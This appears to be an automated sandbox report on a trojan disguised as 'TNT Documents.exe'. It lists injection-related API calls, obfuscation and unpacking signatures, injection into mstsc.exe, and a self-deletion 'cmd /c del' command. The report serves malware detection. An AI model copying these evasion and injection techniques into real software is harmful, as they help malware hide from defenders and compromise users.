Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01582581 7_2_01582581
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161D466 7_2_0161D466
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156841F 7_2_0156841F
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01621FF1 7_2_01621FF1
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0162DFCE 7_2_0162DFCE
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01576E30 7_2_01576E30
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161D616 7_2_0161D616
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01622EF7 7_2_01622EF7
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_00AA4D8E 7_2_00AA4D8E
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_00AA958F 7_2_00AA958F
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05681D55 17_2_05681D55
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05682D07 17_2_05682D07
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055B0D20 17_2_055B0D20
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056825DD 17_2_056825DD
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055CD5E0 17_2_055CD5E0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E2581 17_2_055E2581
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0567D466 17_2_0567D466
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C841F 17_2_055C841F
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05681FF1 17_2_05681FF1
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055D6E30 17_2_055D6E30
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0567D616 17_2_0567D616
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05682EF7 17_2_05682EF7
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BF900 17_2_055BF900
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055D4120 17_2_055D4120
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671002 17_2_05671002
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056828EC 17_2_056828EC
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056820A8 17_2_056820A8
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055CB090 17_2_055CB090
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E20A0 17_2_055E20A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05682B28 17_2_05682B28
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0567DBD2 17_2_0567DBD2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EEBB0 17_2_055EEBB0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056822AE 17_2_056822AE
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_03312FB0 17_2_03312FB0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_03312D90 17_2_03312D90
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_03312D87 17_2_03312D87
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_03318C90 17_2_03318C90
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_03318C8B 17_2_03318C8B
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: String function: 0155B150 appears 35 times
Source: C:\Windows\SysWOW64\mstsc.exe Code function: String function: 055BB150 appears 35 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_004185F0 NtCreateFile, 7_2_004185F0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_004186A0 NtReadFile, 7_2_004186A0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_00418720 NtClose, 7_2_00418720
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_004187D0 NtAllocateVirtualMemory, 7_2_004187D0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_004185EA NtCreateFile, 7_2_004185EA
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_00418642 NtReadFile, 7_2_00418642
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0041869A NtReadFile, 7_2_0041869A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_004187CB NtAllocateVirtualMemory, 7_2_004187CB
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599910 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_01599910
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015999A0 NtCreateSection,LdrInitializeThunk, 7_2_015999A0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599840 NtDelayExecution,LdrInitializeThunk, 7_2_01599840
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599860 NtQuerySystemInformation,LdrInitializeThunk, 7_2_01599860
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015998F0 NtReadVirtualMemory,LdrInitializeThunk, 7_2_015998F0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599A50 NtCreateFile,LdrInitializeThunk, 7_2_01599A50
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599A00 NtProtectVirtualMemory,LdrInitializeThunk, 7_2_01599A00
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599A20 NtResumeThread,LdrInitializeThunk, 7_2_01599A20
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599540 NtReadFile,LdrInitializeThunk, 7_2_01599540
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015995D0 NtClose,LdrInitializeThunk, 7_2_015995D0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599710 NtQueryInformationToken,LdrInitializeThunk, 7_2_01599710
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599FE0 NtCreateMutant,LdrInitializeThunk, 7_2_01599FE0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599780 NtMapViewOfSection,LdrInitializeThunk, 7_2_01599780
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015997A0 NtUnmapViewOfSection,LdrInitializeThunk, 7_2_015997A0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599660 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_01599660
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015996E0 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_015996E0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599950 NtQueueApcThread, 7_2_01599950
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015999D0 NtCreateProcessEx, 7_2_015999D0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0159B040 NtSuspendThread, 7_2_0159B040
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599820 NtEnumerateKey, 7_2_01599820
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015998A0 NtWriteVirtualMemory, 7_2_015998A0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599B00 NtSetValueKey, 7_2_01599B00
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0159A3B0 NtGetContextThread, 7_2_0159A3B0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599A10 NtQuerySection, 7_2_01599A10
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599A80 NtOpenDirectoryObject, 7_2_01599A80
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599560 NtWriteFile, 7_2_01599560
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0159AD30 NtSetContextThread, 7_2_0159AD30
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599520 NtWaitForSingleObject, 7_2_01599520
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015995F0 NtQueryInformationFile, 7_2_015995F0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0159A770 NtOpenThread, 7_2_0159A770
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599770 NtSetInformationFile, 7_2_01599770
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599760 NtOpenProcess, 7_2_01599760
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0159A710 NtOpenProcessToken, 7_2_0159A710
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599730 NtQueryVirtualMemory, 7_2_01599730
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599650 NtQueryValueKey, 7_2_01599650
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599670 NtQueryInformationProcess, 7_2_01599670
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01599610 NtEnumerateValueKey, 7_2_01599610
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015996D0 NtCreateKey, 7_2_015996D0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9540 NtReadFile,LdrInitializeThunk, 17_2_055F9540
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F95D0 NtClose,LdrInitializeThunk, 17_2_055F95D0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9710 NtQueryInformationToken,LdrInitializeThunk, 17_2_055F9710
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9FE0 NtCreateMutant,LdrInitializeThunk, 17_2_055F9FE0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9780 NtMapViewOfSection,LdrInitializeThunk, 17_2_055F9780
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9650 NtQueryValueKey,LdrInitializeThunk, 17_2_055F9650
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9660 NtAllocateVirtualMemory,LdrInitializeThunk, 17_2_055F9660
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F96D0 NtCreateKey,LdrInitializeThunk, 17_2_055F96D0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F96E0 NtFreeVirtualMemory,LdrInitializeThunk, 17_2_055F96E0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 17_2_055F9910
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F99A0 NtCreateSection,LdrInitializeThunk, 17_2_055F99A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9840 NtDelayExecution,LdrInitializeThunk, 17_2_055F9840
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9860 NtQuerySystemInformation,LdrInitializeThunk, 17_2_055F9860
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9A50 NtCreateFile,LdrInitializeThunk, 17_2_055F9A50
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9560 NtWriteFile, 17_2_055F9560
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055FAD30 NtSetContextThread, 17_2_055FAD30
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9520 NtWaitForSingleObject, 17_2_055F9520
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F95F0 NtQueryInformationFile, 17_2_055F95F0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055FA770 NtOpenThread, 17_2_055FA770
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9770 NtSetInformationFile, 17_2_055F9770
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9760 NtOpenProcess, 17_2_055F9760
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055FA710 NtOpenProcessToken, 17_2_055FA710
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9730 NtQueryVirtualMemory, 17_2_055F9730
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F97A0 NtUnmapViewOfSection, 17_2_055F97A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9670 NtQueryInformationProcess, 17_2_055F9670
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9610 NtEnumerateValueKey, 17_2_055F9610
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9950 NtQueueApcThread, 17_2_055F9950
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F99D0 NtCreateProcessEx, 17_2_055F99D0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055FB040 NtSuspendThread, 17_2_055FB040
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9820 NtEnumerateKey, 17_2_055F9820
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F98F0 NtReadVirtualMemory, 17_2_055F98F0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F98A0 NtWriteVirtualMemory, 17_2_055F98A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9B00 NtSetValueKey, 17_2_055F9B00
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055FA3B0 NtGetContextThread, 17_2_055FA3B0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9A10 NtQuerySection, 17_2_055F9A10
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9A00 NtProtectVirtualMemory, 17_2_055F9A00
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9A20 NtResumeThread, 17_2_055F9A20
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F9A80 NtOpenDirectoryObject, 17_2_055F9A80
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_03328720 NtClose, 17_2_03328720
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_033287D0 NtAllocateVirtualMemory, 17_2_033287D0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_033286A0 NtReadFile, 17_2_033286A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_033285F0 NtCreateFile, 17_2_033285F0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_033287CB NtAllocateVirtualMemory, 17_2_033287CB
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_03328642 NtReadFile, 17_2_03328642
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0332869A NtReadFile, 17_2_0332869A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_033285EA NtCreateFile, 17_2_033285EA
Sample file is different than original file name gathered from version info
Source: TNT Documents.exe, 00000000.00000000.252292198.00000000000EE000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamekvhWV10.exe8 vs TNT Documents.exe
Source: TNT Documents.exe, 00000000.00000002.300957032.0000000006DC0000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameMajorRevision.exe< vs TNT Documents.exe
Source: TNT Documents.exe, 00000000.00000002.294580237.00000000026F2000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameMajorRevision.exe< vs TNT Documents.exe
Source: TNT Documents.exe, 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameMajorRevision.exe< vs TNT Documents.exe
Source: TNT Documents.exe, 00000000.00000002.294032469.0000000002381000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameBunifu.UI.dll4 vs TNT Documents.exe
Source: TNT Documents.exe, 00000005.00000000.280071270.00000000001AE000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamekvhWV10.exe8 vs TNT Documents.exe
Source: TNT Documents.exe, 00000007.00000000.286422780.0000000000B1E000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamekvhWV10.exe8 vs TNT Documents.exe
Source: TNT Documents.exe, 00000007.00000002.362999077.0000000003523000.00000040.00020000.sdmp Binary or memory string: OriginalFilenamemstsc.exej% vs TNT Documents.exe
Source: TNT Documents.exe, 00000007.00000002.362181801.00000000017DF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs TNT Documents.exe
Source: TNT Documents.exe, 00000007.00000002.361759586.000000000164F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs TNT Documents.exe
Source: TNT Documents.exe Binary or memory string: OriginalFilenamekvhWV10.exe8 vs TNT Documents.exe
Source: TNT Documents.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: TNT Documents.exe ReversingLabs: Detection: 46%
Source: TNT Documents.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\TNT Documents.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\TNT Documents.exe "C:\Users\user\Desktop\TNT Documents.exe"
Source: C:\Users\user\Desktop\TNT Documents.exe Process created: C:\Users\user\Desktop\TNT Documents.exe {path}
Source: C:\Users\user\Desktop\TNT Documents.exe Process created: C:\Users\user\Desktop\TNT Documents.exe {path}
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
Source: C:\Windows\SysWOW64\mstsc.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TNT Documents.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TNT Documents.exe Process created: C:\Users\user\Desktop\TNT Documents.exe {path} Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process created: C:\Users\user\Desktop\TNT Documents.exe {path} Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TNT Documents.exe" Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TNT Documents.exe.log Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@9/1@10/4
Source: C:\Users\user\Desktop\TNT Documents.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4484:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: TNT Documents.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: TNT Documents.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: TNT Documents.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wntdll.pdbUGP source: TNT Documents.exe, 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, TNT Documents.exe, 00000007.00000002.361759586.000000000164F000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: TNT Documents.exe, TNT Documents.exe, 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, TNT Documents.exe, 00000007.00000002.361759586.000000000164F000.00000040.00000001.sdmp, mstsc.exe, mstsc.exe, 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp
Source: Binary string: mstsc.pdbGCTL source: TNT Documents.exe, 00000007.00000002.362758177.0000000003400000.00000040.00020000.sdmp
Source: Binary string: mstsc.pdb source: TNT Documents.exe, 00000007.00000002.362758177.0000000003400000.00000040.00020000.sdmp

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: TNT Documents.exe, Form1.cs .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.TNT Documents.exe.70000.0.unpack, Form1.cs .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.2.TNT Documents.exe.70000.0.unpack, Form1.cs .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.TNT Documents.exe.130000.1.unpack, Form1.cs .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.TNT Documents.exe.130000.2.unpack, Form1.cs .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.TNT Documents.exe.130000.0.unpack, Form1.cs .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.2.TNT Documents.exe.130000.0.unpack, Form1.cs .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.TNT Documents.exe.130000.3.unpack, Form1.cs .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.2.TNT Documents.exe.aa0000.1.unpack, Form1.cs .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.0.TNT Documents.exe.aa0000.9.unpack, Form1.cs .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.0.TNT Documents.exe.aa0000.2.unpack, Form1.cs .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.0.TNT Documents.exe.aa0000.5.unpack, Form1.cs .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.0.TNT Documents.exe.aa0000.1.unpack, Form1.cs .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.0.TNT Documents.exe.aa0000.7.unpack, Form1.cs .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_00080576 push ebx; iretd 0_2_000805B7
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 0_2_06E70ABA pushfd ; iretd 0_2_06E70ABC
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 5_2_00140576 push ebx; iretd 5_2_001405B7
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0041B832 push eax; ret 7_2_0041B838
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0041B83B push eax; ret 7_2_0041B8A2
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0041B89C push eax; ret 7_2_0041B8A2
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0040825A push ecx; retf 7_2_0040825B
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0040C38A pushfd ; ret 7_2_0040C3A0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_00415CC4 push FFFFFFDFh; iretd 7_2_00415CDA
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0041B7E5 push eax; ret 7_2_0041B838
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_00AB0576 push ebx; iretd 7_2_00AB05B7
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015AD0D1 push ecx; ret 7_2_015AD0E4
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0560D0D1 push ecx; ret 17_2_0560D0E4
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0331C38A pushfd ; ret 17_2_0331C3A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0331825A push ecx; retf 17_2_0331825B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0332B832 push eax; ret 17_2_0332B838
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0332B83B push eax; ret 17_2_0332B8A2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0332B89C push eax; ret 17_2_0332B8A2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0332B7E5 push eax; ret 17_2_0332B838
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_03325CC4 push FFFFFFDFh; iretd 17_2_03325CDA
Binary contains a suspicious time stamp
Source: TNT Documents.exe Static PE information: 0xA539E86C [Sat Nov 3 17:54:52 2057 UTC]
Source: initial sample Static PE information: section name: .text entropy: 7.56105630003

Hooking and other Techniques for Hiding and Protection:

barindex
Self deletion via cmd delete
Source: C:\Windows\SysWOW64\mstsc.exe Process created: /c del "C:\Users\user\Desktop\TNT Documents.exe"
Source: C:\Windows\SysWOW64\mstsc.exe Process created: /c del "C:\Users\user\Desktop\TNT Documents.exe" Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

